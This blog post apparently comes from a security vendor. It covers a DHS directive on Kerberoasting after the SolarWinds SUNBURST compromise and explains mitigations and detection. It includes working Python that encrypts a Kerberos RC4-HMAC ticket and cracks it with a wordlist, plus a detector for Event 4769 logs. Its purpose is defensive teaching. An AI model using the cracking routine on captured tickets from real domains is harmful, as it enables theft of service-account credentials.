DHS Calls Out Kerberoasting In Directive Following Russian Hack

Sophisticated nation-state hackers who compromised a string of federal agencies in recent months used Kerberoasting to recover the passwords of Active Directory service accounts and move laterally within compromised government networks, according to the latest guidance from the Department of Homeland Security.

In an Emergency Directive published on Sunday, the agency instructs federal agencies to “take action to remediate kerberoasting,” including engaging with third party organizations that have experience “eradicating APTs from enterprise networks,” a reference to so-called “advanced persistent threats.” As we noted in a QOMPLX Knowledge blog post in May, Kerberoasting is a pervasive attack technique. It abuses a normal feature of Kerberos rather than a bug: any authenticated domain user can ask the domain controller for a service ticket to any account that has a Service Principal Name (SPN), and part of that ticket is encrypted with a key derived from the service account’s password. The attacker saves the tickets and cracks them offline, guessing candidate passwords until one reproduces the key. Nothing is dumped from memory and no privilege is needed on the domain controller; the “hash” being cracked is the encrypted ticket itself.

Kerberoasting and Lateral Movement

As a post-exploitation technique, Kerberoasting is useful because an attacker does not need domain administrator credentials to pull off the attack: any domain user account is sufficient. Also, the only network traffic the attack generates is ordinary ticket requests to the domain controller, which look like legitimate Kerberos activity; nothing is sent to the target service itself, and the password guessing happens offline on attacker hardware, which helps avoid detection.

The DHS Directive comes as U.S. government agencies are scrambling to assess the damage from a widespread hack believed to be linked to Russian government-backed hackers variously identified as “UNC2452” (FireEye) and “Cozy Bear” (CrowdStrike).

Supply Chain Hack Kicked Off Sophisticated Operation

The attack began with a compromise of software updates from SolarWinds, a provider of network management and monitoring tools that counts a number of government agencies as customers. According to reports, as many as 18,000 organizations downloaded the compromised SolarWinds Orion software prior to discovery of the attack, including the security firm FireEye which has published many of the details of the attack in an effort to warn customers and the public.

In a blog post, FireEye said the attack was sophisticated and human-directed, rather than automated and indiscriminate. Attackers trojanized a digitally signed SolarWinds Orion DLL with a backdoor that communicates via HTTP to third-party servers. FireEye has designated the backdoor “SUNBURST.”

DHS Mandates Rapid Response

In its directive, DHS instructed agencies to immediately disconnect or “power down” affected versions of the Orion product. DHS also provided instructions for government agencies hoping to detect breaches and instructed them to report any incidents to the Cybersecurity and Infrastructure Security Agency (CISA) by the end of day, Monday.

DHS guidance to agencies borrows from CISA’s own alert and ‘best practices’ for avoiding Kerberoasting attacks, including “cycling” (resetting) the passwords of Active Directory service accounts and setting strong (25 characters or longer), unique passwords for every such account, which makes offline cracking impractical. Agencies are also instructed to require Active Directory service accounts to use AES encryption for Kerberos (AES-256 where possible) and to stop accepting the legacy DES and RC4 encryption types. The distinction matters: an RC4 ticket is keyed directly on the unsalted NT hash of the password, so a cracking rig can test candidates at very high rates and reuse precomputed hashes across accounts, whereas the AES key derivation is salted per account and iterated 4,096 times. One caveat practitioners should keep in mind is that resetting a password does nothing to tickets an attacker has already captured; those can still be cracked offline, and the reset only ensures that the password recovered no longer works.
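The following is an added example, not code from the original post or from QOMPLX, that makes the mechanics in the Kerberoasting section and the encryption-type point in the guidance above concrete. It implements the RC4-HMAC (etype 23) ticket encryption from RFC 4757 and the NT-hash key derivation it depends on, encrypts a constructed service ticket under a guessable password, and then “cracks” it with a tiny wordlist the way hashcat mode 13100 or John’s krb5tgs format would. The realm name, account names, SPN, wordlist and ticket bytes are all made up for the example; the AES comparison shows only the PBKDF2 stage of the RFC 3962 string-to-key function, since the standard library has no AES for the final DK() step.

```python
import hashlib
import hmac
import os
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 depends on OpenSSL's legacy
    provider and is often unavailable, so the NT hash is computed here directly."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


TICKET_USAGE = 2  # RFC 4120 key-usage number for the ticket enc-part in a TGS-REP


def nt_hash(password: str) -> bytes:
    # etype 23 (RC4-HMAC) key: MD4 of the UTF-16LE password. No salt, no iteration,
    # and no dependence on the account name, so one guess covers every account.
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757: output is checksum(16) || RC4(K3, confounder(8) || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))  # usage 3 would be mapped to 8 per the RFC
    data = os.urandom(8) + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Returns the plaintext, or None when the key is wrong (HMAC check fails)."""
    checksum, body = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), body)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]


def hashcat_line(user: str, realm: str, spn: str, edata: bytes) -> str:
    # layout used by hashcat mode 13100 / John krb5tgs: $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_rc4_ticket(edata: bytes, candidates):
    # per guess: one MD4, three HMAC-MD5s and one RC4 pass. Cheap and GPU-friendly.
    for pw in candidates:
        if rc4_hmac_decrypt(nt_hash(pw), TICKET_USAGE, edata) is not None:
            return pw
    return None


def aes_pbkdf2_stage(password: str, realm: str, principal: str) -> bytes:
    # First stage of RFC 3962 string-to-key for aes256-cts-hmac-sha1-96: PBKDF2-HMAC-SHA1,
    # 4096 iterations, salt = REALM + principal. The final AES-based DK() step is omitted.
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), (realm + principal).encode("utf-8"), 4096, 32)


def demo():
    # Constructed scenario: a service account with a guessable password; any domain user
    # can request a ticket for it and crack the ticket offline with a wordlist.
    realm, weak_pw = "CORP.LOCAL", "Summer2020!"
    ticket = rc4_hmac_encrypt(nt_hash(weak_pw), TICKET_USAGE, b"<constructed EncTicketPart bytes>")
    wordlist = ["Password1", "Winter2020!", "Summer2020!", "Welcome123"]
    return {
        "hashcat_line": hashcat_line("bob", realm, "MSSQLSvc/sql01.corp.local:1433", ticket),
        "cracked": crack_rc4_ticket(ticket, wordlist),
        # same password on two accounts gives identical RC4 keys but different AES keys (salted)
        "aes_keys_equal": aes_pbkdf2_stage(weak_pw, realm, "svc-sql") == aes_pbkdf2_stage(weak_pw, realm, "svc-http"),
    }


if __name__ == "__main__":
    print(demo())
```

The `crack_rc4_ticket` loop is the entire “attack” once a ticket is in hand, which is why a 25-character random password (roughly 150 bits of entropy) is the practical mitigation: no wordlist or mask reaches it. The `aes_keys_equal` result being false is the salt at work; with AES the attacker must redo the 4,096-iteration derivation for every account and every guess, while the RC4 key of one account is the RC4 key of every account sharing that password.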

Attackers Looking High and Low

Experts note that the SolarWinds Orion product is a rich target for would-be attackers. As a network management platform, it has privileged access to sensitive IT assets across a network environment.

The attack suggests that sophisticated actors are looking both “high” and “low” in efforts to compromise well-resourced organizations. Along with authentication, logging and monitoring infrastructure like Orion is part of an organization’s Critical Controls Infrastructure, said Andy Jaquith, CISO at QOMPLX. “Critical Controls Infrastructure is the ‘central nervous system’ for the CISO. Monitoring agents aren’t quite as high up the enterprise control hierarchy as authentication is, but they are attractive targets because they are ubiquitously deployed and generally possess high privileges,” said Jaquith. “Threat actors go after CCI because of their privileged position. Successful compromises facilitate large-scale breaches.”

How QOMPLX Spots Kerberoasting

QOMPLX’s technology monitors for telltale signs of Kerberoasting, such as a single domain user account requesting service tickets for an unusually large number of SPN-bearing accounts in a short period (Security Event ID 4769), particularly when the tickets use the RC4 encryption type (0x17) that cracking tools request wherever the domain still allows it.

In addition, QOMPLX’s Privilege Assurance tool reduces the likelihood of service accounts being over-permissioned. Service accounts are often found to be members of the Domain Admins group or other groups with permissions far beyond what the service actually needs, which turns a single cracked service account password into a domain-wide compromise. Among other detections, QOMPLX:CYBER monitors Windows event logs for suspicious actions (for example, service ticket requests using RC4 encryption), comparing transaction history against Domain Controller logs to build behavioral indicators of attempted Kerberoasting activity. Using Q:CYBER’s Windowed Rules feature together with Active Directory “honeytokens” (SPN-bearing accounts that exist only as bait, so any ticket request for them is suspect), organizations can detect Kerberoasting attacks in real time.
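As an added example, not part of the original post and not QOMPLX’s product logic, the block below runs the three detections described above over a constructed batch of Event ID 4769 records: a weak-encryption-type rule, a honeytoken rule, and a windowed rule that flags one requester asking for tickets to many distinct SPN accounts within a few minutes. The account names, SPNs, IP addresses, timestamps and the honeytoken name are invented for the example; in a real deployment the rows would come from the Security log (via the EvtQuery API, a SIEM, or Get-WinEvent exports).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security Event ID 4769 fields (not real log data). In a 4769,
# TargetUserName is the requesting principal and ServiceName is the account that owns the SPN.
SAMPLE_4769 = [
    # (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType, IpAddress)
    ("2020-12-14T09:00:01", "alice@CORP.LOCAL", "svc-sql", "0x12", "10.0.1.15"),
    ("2020-12-14T09:00:02", "alice@CORP.LOCAL", "FS01$", "0x12", "10.0.1.15"),
    ("2020-12-14T09:03:10", "bob@CORP.LOCAL", "svc-sql", "0x17", "10.0.1.99"),
    ("2020-12-14T09:03:10", "bob@CORP.LOCAL", "svc-http", "0x17", "10.0.1.99"),
    ("2020-12-14T09:03:11", "bob@CORP.LOCAL", "svc-backup", "0x17", "10.0.1.99"),
    ("2020-12-14T09:03:11", "bob@CORP.LOCAL", "svc-sharepoint", "0x17", "10.0.1.99"),
    ("2020-12-14T09:03:12", "bob@CORP.LOCAL", "svc-legacy", "0x17", "10.0.1.99"),
    ("2020-12-14T10:30:00", "carol@CORP.LOCAL", "svc-http", "0x12", "10.0.2.7"),
]

# Ticket encryption types that are cheap to crack offline (see the guidance above).
WEAK_ETYPES = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5", "0x17": "RC4-HMAC"}
# Assumed honeytoken: an SPN-bearing account created only as bait, never used by real clients.
HONEYTOKENS = {"svc-legacy"}


def parse_events(rows):
    return [{"time": datetime.fromisoformat(t), "requester": u, "service": s, "etype": e, "ip": ip}
            for t, u, s, e, ip in rows]


def is_noise(service):
    # computer accounts and krbtgt generate constant 4769 traffic and are not Kerberoast targets
    return service.endswith("$") or service.lower() == "krbtgt"


def weak_etype_requests(events):
    # Low-confidence on its own: 0x17 also appears when the service account simply lacks AES.
    return [e for e in events if e["etype"] in WEAK_ETYPES and not is_noise(e["service"])]


def honeytoken_hits(events):
    # High-confidence: nothing legitimate should ever request a ticket for a bait account.
    return [(e["requester"], e["service"], e["ip"]) for e in events if e["service"] in HONEYTOKENS]


def burst_requesters(events, window=timedelta(minutes=5), threshold=4):
    """Windowed rule: a requester asking for tickets to >= threshold distinct SPN accounts
    inside `window`. Returns {requester: max distinct services seen in one window}."""
    by_user = defaultdict(list)
    for e in events:
        if not is_noise(e["service"]):
            by_user[e["requester"]].append(e)
    hits = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            distinct = {e["service"] for e in evs[start:end + 1]}
            if len(distinct) >= threshold:
                hits[user] = max(hits.get(user, 0), len(distinct))
    return hits


def triage(rows):
    events = parse_events(rows)
    return {
        "weak_etype": len(weak_etype_requests(events)),
        "honeytoken": honeytoken_hits(events),
        "burst": burst_requesters(events),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_4769))
```

Tuning notes: the threshold and window need to be set per environment (monitoring agents and backup jobs legitimately touch many SPNs), the RC4 rule should be cross-checked against each service account’s msDS-SupportedEncryptionTypes so that accounts which genuinely cannot do AES are handled as a remediation item rather than an alert, and the honeytoken account should look plausible (a realistic SPN, a password set, never logged in) so that enumeration tools pick it up.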

Read our post on Kerberoasting or our QOMPLX Knowledge series for more information on identifying and stopping common Active Directory attacks.